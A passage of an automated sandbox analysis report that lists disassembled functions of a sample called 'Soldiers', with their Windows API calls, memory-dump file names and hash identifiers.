                                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 008F5BBC
                                                          • Shell_NotifyIconW.SHELL32(00000001,000003A8,?,?), ref: 00930D7C
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                          • String ID:
                                                          • API String ID: 1378193009-0
                                                          • Opcode ID: 8c2a28cf85eea2f0347e6421e2e520a829055a6c6b7383a7a4f7ded31133e74e
                                                          • Instruction ID: ed2faa869b09b43bc5ec43a243cbb2007361b78e3d9ac2008790d2c9e4b8bf1f
                                                          • Opcode Fuzzy Hash: 8c2a28cf85eea2f0347e6421e2e520a829055a6c6b7383a7a4f7ded31133e74e
                                                          • Instruction Fuzzy Hash: 3221AA715087989FE7728B748CA9BFABBECEF41314F04048DE7AD96181D3742984DB51
                                                          Function 00944365 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00944385
                                                          • _memset.LIBCMT ref: 009443A6
                                                          • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 009443F8
                                                          • CloseHandle.KERNEL32(00000000), ref: 00944401
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: CloseControlCreateDeviceFileHandle_memset
                                                          • String ID:
                                                          • API String ID: 1157408455-0
                                                          • Opcode ID: 9a80ba8cc2dcec4a953afba1da4c190fb55f3266e9f22aa74d4f8e9f1d0fc387
                                                          • Instruction ID: e27c9121310242d1a0966cde7b747578b4134af5a72014213f783e43ce69c4d3
                                                          • Opcode Fuzzy Hash: 9a80ba8cc2dcec4a953afba1da4c190fb55f3266e9f22aa74d4f8e9f1d0fc387
                                                          • Instruction Fuzzy Hash: AE11CD76D01228BAD7309BA5AC4DFEBBB7CEF45760F10459AF908D7190E6744E80CBA4
                                                          Function 00956A54 Relevance: 6.1, APIs: 4, Instructions: 61COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 008F402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00947E51,?,?,00000000), ref: 008F4041
                                                            • Part of subcall function 008F402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00947E51,?,?,00000000,?,?), ref: 008F4065
                                                          • #52.WSOCK32(?,?,?), ref: 00956A84
                                                          • #111.WSOCK32(00000000), ref: 00956A8F
                                                          • _memmove.LIBCMT ref: 00956ABC
                                                          • #11.WSOCK32(?), ref: 00956AC7
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: ByteCharMultiWide$#111_memmove
                                                          • String ID:
                                                          • API String ID: 70051993-0
                                                          • Opcode ID: 2f19d989b5bd0f3127a08d65d16d536d659a198d7125f6e51f0956f0a3f11b4f
                                                          • Instruction ID: 54eb99267b1f83015a0e79fcd61f59b379af9f492ae639e6304c169402e79b7b
                                                          • Opcode Fuzzy Hash: 2f19d989b5bd0f3127a08d65d16d536d659a198d7125f6e51f0956f0a3f11b4f
                                                          • Instruction Fuzzy Hash: 18114276900108DFCB00EBA5CD46DEEB7B8FF44311B144065F605E71A1DF319E149BA2
                                                          Function 009396F9 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00939719
                                                          • SendMessageW.USER32(?,000000C9,?,00000000,?,000000B0,?,?), ref: 0093972B
                                                          • SendMessageW.USER32(?,000000C9,?,00000000,?,000000C9,?,00000000,?,000000B0,?,?), ref: 00939741
                                                          • SendMessageW.USER32(?,000000C9,?,00000000,?,000000C9,?,00000000,?,000000C9,?,00000000,?,000000B0,?,?), ref: 0093975C
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID:
                                                          • API String ID: 3850602802-0
                                                          • Opcode ID: 07d75cf08739d6fcc00dea0c4037eca130de59cccd54d214c9341b9fbbf8d7f8
                                                          • Instruction ID: b25969d6bebb15008834f4469db2b38fa88b183a3c964670ec0be10149716a67
                                                          • Opcode Fuzzy Hash: 07d75cf08739d6fcc00dea0c4037eca130de59cccd54d214c9341b9fbbf8d7f8
                                                          • Instruction Fuzzy Hash: D311483A900218FFEB10DF95C985FADBBB8FB48710F204091E905B7290D6716E11DB94
                                                          Function 008E166C Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 008E29E2: GetWindowLongW.USER32(?,000000EB,?,?,?,008E1CE4,?), ref: 008E29F3
                                                          • DefDlgProcW.USER32(?,00000020,?), ref: 008E16B4
                                                          • GetClientRect.USER32(?,?,?,?,?), ref: 0091B93C
                                                          • GetCursorPos.USER32(?), ref: 0091B946
                                                          • ScreenToClient.USER32(?,?), ref: 0091B951
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: Client$CursorLongProcRectScreenWindow
                                                          • String ID:
                                                          • API String ID: 4127811313-0
                                                          • Opcode ID: 11608179d147a5744534b0c1918bf72004098508e7db88218df6cc1807f13d2a
                                                          • Instruction ID: 0e6007ea3984f7dffe53ba95267317a9565aaad7f30837f7f3a7c9ed251beb73
                                                          • Opcode Fuzzy Hash: 11608179d147a5744534b0c1918bf72004098508e7db88218df6cc1807f13d2a
                                                          • Instruction Fuzzy Hash: 4C114636A00059EFCF00EFA9C88ADBE77B8FB96300F400455F901E7160C330AA91DBA1
                                                          Function 008E2111 Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096,?,00000096,?,008E2004), ref: 008E214F
                                                          • GetStockObject.GDI32(00000011,00000000,?,00000096,?,008E2004,?,?,static,00970980,?,?,?,00000096,00000096,?), ref: 008E2163
                                                          • SendMessageW.USER32(00000000,00000030,00000000,?,00000096,?,008E2004,?,?,static,00970980,?,?,?,00000096,00000096), ref: 008E216D
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: CreateMessageObjectSendStockWindow
                                                          • String ID:
                                                          • API String ID: 3970641297-0
                                                          • Opcode ID: 9564c760942c8f1757235ccfc542eb4867645f7fcc34d4987923dff1977372e9
                                                          • Instruction ID: dd7ed269a4927aad65f5aaa7fc0a00b640bccdadfd04c47d38bb7e0d96aece73
                                                          • Opcode Fuzzy Hash: 9564c760942c8f1757235ccfc542eb4867645f7fcc34d4987923dff1977372e9
                                                          • Instruction Fuzzy Hash: 30118B7210528DBFDB064F919C85EEABB6DFF9A754F040111FA0892010D731ADA0ABA0
                                                          Function 00941941 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,009404EC,?,0094153F,?,00008000), ref: 0094195E
                                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,009404EC,?,0094153F,?,00008000), ref: 00941983
                                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,009404EC,?,0094153F,?,00008000), ref: 0094198D
                                                          • Sleep.KERNEL32(?,?,?,?,?,?,?,009404EC,?,0094153F,?,00008000), ref: 009419C0
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: CounterPerformanceQuerySleep
                                                          • String ID:
                                                          • API String ID: 2875609808-0
                                                          • Opcode ID: c1e8ab82187af35cc75ffba5cf1f44c143d39b9d726843a7a9b2a759c6283d38
                                                          • Instruction ID: 058bfa845dd96aeabebf6e12abe144b925cc324cda0d033a565db6e776874751
                                                          • Opcode Fuzzy Hash: c1e8ab82187af35cc75ffba5cf1f44c143d39b9d726843a7a9b2a759c6283d38
                                                          • Instruction Fuzzy Hash: C1113C32D1851DDBCF009FA5E958BEEBB78FF48751F404555E984B2240DB3096D0DB91
                                                          Function 0096E1CE Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 0096E1EA
                                                          • #183.OLEAUT32(?,00000002,0000000C), ref: 0096E201
                                                          • #163.OLEAUT32(0000000C,?,00000000), ref: 0096E216
                                                          • #442.OLEAUT32(0000000C,?,00000000), ref: 0096E234
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: #163#183#442FileModuleName
                                                          • String ID:
                                                          • API String ID: 2875472535-0
                                                          • Opcode ID: 70d62ee91a8c9dd471272ba38423b706e843fc75f09fd3f8dbea0bb2b831fc3f
                                                          • Instruction ID: 8aa3c6a1a2e14e6bfaa44d40317b0a9e8505865ce6fb06b9f0696712aeb713b5
                                                          • Opcode Fuzzy Hash: 70d62ee91a8c9dd471272ba38423b706e843fc75f09fd3f8dbea0bb2b831fc3f
                                                          • Instruction Fuzzy Hash: 4F1161B9205308DBE3308F51DD0CF93BBBDEB40B04F108959A62AD6090E7B4E554ABA1
                                                          Function 009171E7 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                          • String ID:
                                                          • API String ID: 3016257755-0
                                                          • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                          • Instruction ID: 3583f1a8ab1f9a2eb2af973e49afc7b17563b422caffe29d335aa697b4a94c63
                                                          • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                          • Instruction Fuzzy Hash: 5A01897228814EBBCF126EC4CC41CEE7F36BB59350B588915FE2858131C336C9B2AB91
                                                          Function 0096B937 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetWindowRect.USER32(?,?,?,?,?,?,?,?,?,?,?), ref: 0096B956
                                                          • ScreenToClient.USER32(?,?,?,?,?,?,?,?,?,?,?), ref: 0096B96E
                                                          • ScreenToClient.USER32(?,?,?,?,?,?,?,?,?,?,?), ref: 0096B992
                                                          • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0096B9AD
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: ClientRectScreen$InvalidateWindow
                                                          • String ID:
                                                          • API String ID: 357397906-0
                                                          • Opcode ID: 1eb3f30bfaad414aed091678204152f5dbd76077029e80dc08386600b1d10c1a
                                                          • Instruction ID: 81ff3e17d7682a737bd0fa9a3bdeae1909674ac7628a9b48f664a97f3eadb240
                                                          • Opcode Fuzzy Hash: 1eb3f30bfaad414aed091678204152f5dbd76077029e80dc08386600b1d10c1a
                                                          • Instruction Fuzzy Hash: 9E1144B9D04209EFDB41DFA8C984AEEBBF9FF48310F104156E914E3610D735AAA59F50
                                                          Function 0096BCA7 Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _memset.LIBCMT ref: 0096BCB6
                                                          • _memset.LIBCMT ref: 0096BCC5
                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,009A8F20,009A8F64), ref: 0096BCF4
                                                          • CloseHandle.KERNEL32 ref: 0096BD06
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: _memset$CloseCreateHandleProcess
                                                          • String ID:
                                                          • API String ID: 3277943733-0
                                                          • Opcode ID: 297781275c8bbdf866ce558001865d806d6da72222f4e9b18a594b7945ca2873
                                                          • Instruction ID: ef04694f069ea52e465bd626201b2e8442f40c2eb3adfb0ee2903f028ed3eeca
                                                          • Opcode Fuzzy Hash: 297781275c8bbdf866ce558001865d806d6da72222f4e9b18a594b7945ca2873
                                                          • Instruction Fuzzy Hash: BDF082F2954305BFE3502B61AC05FBB3A5DEF4A750F004421BA08D51A2EB714C50A7F8
                                                          Function 00947195 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • EnterCriticalSection.KERNEL32(?), ref: 009471A1
                                                            • Part of subcall function 00947C7F: _memset.LIBCMT ref: 00947CB4
                                                          • _memmove.LIBCMT ref: 009471C4
                                                          • _memset.LIBCMT ref: 009471D1
                                                          • LeaveCriticalSection.KERNEL32(?), ref: 009471E1
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: CriticalSection_memset$EnterLeave_memmove
                                                          • String ID:
                                                          • API String ID: 48991266-0
                                                          • Opcode ID: 50ac139549e40d42e874dc446af8fbca6437940995e13d053bc9221771d4deba
                                                          • Instruction ID: e42ed65b5a6883c7f1db972a40b991f81d96781e64966498799ba8bda906f0a9
                                                          • Opcode Fuzzy Hash: 50ac139549e40d42e874dc446af8fbca6437940995e13d053bc9221771d4deba
                                                          • Instruction Fuzzy Hash: 11F03A3A200104ABCB016F55EC85F4ABB29EF85321F08C051FE089E26ACB31A951EBB4
                                                          Function 0096C3C4 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 008E16CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 008E1729
                                                            • Part of subcall function 008E16CF: SelectObject.GDI32(?,00000000), ref: 008E1738
                                                            • Part of subcall function 008E16CF: BeginPath.GDI32(?), ref: 008E174F
                                                            • Part of subcall function 008E16CF: SelectObject.GDI32(?,00000000,000000FF,00000000), ref: 008E1778
                                                          • MoveToEx.GDI32(00000000,00000000,?,00000000,00000000,00000000,000000FF,00000002,00000001,?,?,0096C4C0,00000000,?,00000008,00000000), ref: 0096C3E8
                                                          • LineTo.GDI32(00000000,?,?,?,0096C4C0,00000000,?,00000008,00000000,00000000,?), ref: 0096C3F5
                                                          • EndPath.GDI32(00000000,?,0096C4C0,00000000,?,00000008,00000000,00000000,?), ref: 0096C405
                                                          • StrokePath.GDI32(00000000,?,0096C4C0,00000000,?,00000008,00000000,00000000,?), ref: 0096C413
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                          • String ID:
                                                          • API String ID: 1539411459-0
                                                          • Opcode ID: 4ad5f80a40045424300a9318bb8c47e528884f781d5a2bd9a43cad28a6a1674f
                                                          • Instruction ID: 742700dcd38e3525b52990d17a364cec7bf6a79756e0ae485f55f307021f9b8a
                                                          • Opcode Fuzzy Hash: 4ad5f80a40045424300a9318bb8c47e528884f781d5a2bd9a43cad28a6a1674f
                                                          • Instruction Fuzzy Hash: 02F0BE3201D258FADB126F94AC0EFEE3F59AF06320F048000FA55610F187B815A0EBE9
                                                          Function 0093AA52 Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0093AA6F
                                                          • GetWindowThreadProcessId.USER32(?,00000000,00000000), ref: 0093AA82
                                                          • GetCurrentThreadId.KERNEL32 ref: 0093AA89
                                                          • AttachThreadInput.USER32(00000000), ref: 0093AA90
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                          • String ID:
                                                          • API String ID: 2710830443-0
                                                          • Opcode ID: e0794682c1183fa0be11fab86f51f8cb03ccbbe6e98dd16add65e06b30b20d4f
                                                          • Instruction ID: 7626127b51c5bf8883fe8487f9a6e7bcaa750c229f91f8b4ef51e0a6dc7dcce6
                                                          • Opcode Fuzzy Hash: e0794682c1183fa0be11fab86f51f8cb03ccbbe6e98dd16add65e06b30b20d4f
                                                          • Instruction Fuzzy Hash: E6E03932549228FADB215FA29D0DEE73F5DEF917A1F008115F54DC4090C6B68990DBA0
                                                          Function 008E25F4 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetSysColor.USER32(00000008,00000000), ref: 008E260D
                                                          • SetTextColor.GDI32(?,000000FF,00000000), ref: 008E2617
                                                          • SetBkMode.GDI32(?,00000001), ref: 008E262C
                                                          • GetStockObject.GDI32(00000005), ref: 008E2634
                                                          • GetWindowDC.USER32(?,00000000), ref: 0091C1C4
                                                          • GetPixel.GDI32(00000000,00000000,00000000), ref: 0091C1D1
                                                          • GetPixel.GDI32(00000000,?,00000000), ref: 0091C1EA
                                                          • GetPixel.GDI32(00000000,00000000,?), ref: 0091C203
                                                          • GetPixel.GDI32(00000000,?,?), ref: 0091C223
                                                          • ReleaseDC.USER32(?,00000000), ref: 0091C22E
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
